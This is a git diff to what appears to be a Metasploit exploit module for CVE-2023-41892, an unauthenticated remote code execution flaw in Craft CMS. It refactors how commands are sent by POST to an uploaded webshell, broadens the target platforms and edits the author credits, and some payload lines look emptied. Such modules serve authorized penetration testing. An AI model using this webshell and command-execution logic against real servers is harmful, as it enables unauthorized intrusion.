diff --git a/modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb b/modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb index 049ad17f8393..f2e47c6d15ef 100644 --- a/modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb +++ b/modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb @@ -35,8 +35,9 @@ def initialize(info = {}) access to the underlying operating system as the user that the web services are running as (typically www-data). }, 'Author' => [ - 'chybeta', # discovery - 'h00die-gr3y ' # Metasploit module + 'h00die-gr3y ', # Metasploit module + 'Thanh', # discovery + 'chybeta' # poc ], 'References' => [ [ 'CVE', '2023-41892' ], @@ -64,7 +65,7 @@ def initialize(info = {}) [ 'Unix Command', { - 'Platform' => 'unix', + 'Platform' => [ 'unix', 'linux' ], 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { @@ -168,11 +169,11 @@ def upload_webshell EOS else # create the MSL payload - # payload = "" + # payload = "" payload = <<~EOS - + EOS @@ -210,28 +211,12 @@ def upload_webshell false end - def execute_php(cmd, _opts = {}) - payload = Base64.strict_encode64(cmd) - return send_request_cgi({ - 'method' => 'POST', - 'uri' => normalize_uri(datastore['TARGETURI'], @webshell_name), - 'ctype' => 'application/x-www-form-urlencoded', - 'vars_post' => { - @post_param => payload - } - }) - end - def execute_command(cmd, _opts = {}) payload = Base64.strict_encode64(cmd) - php_cmd_function = datastore['COMMAND'] return send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(datastore['TARGETURI'], @webshell_name), 'ctype' => 'application/x-www-form-urlencoded', - 'vars_get' => { - @get_param => php_cmd_function - }, 'vars_post' => { @post_param => payload } @@ -274,9 +259,7 @@ def exploit print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] - when :php - execute_php(payload.encoded) - when :unix_cmd + when :php, :unix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager(linemax: 65536)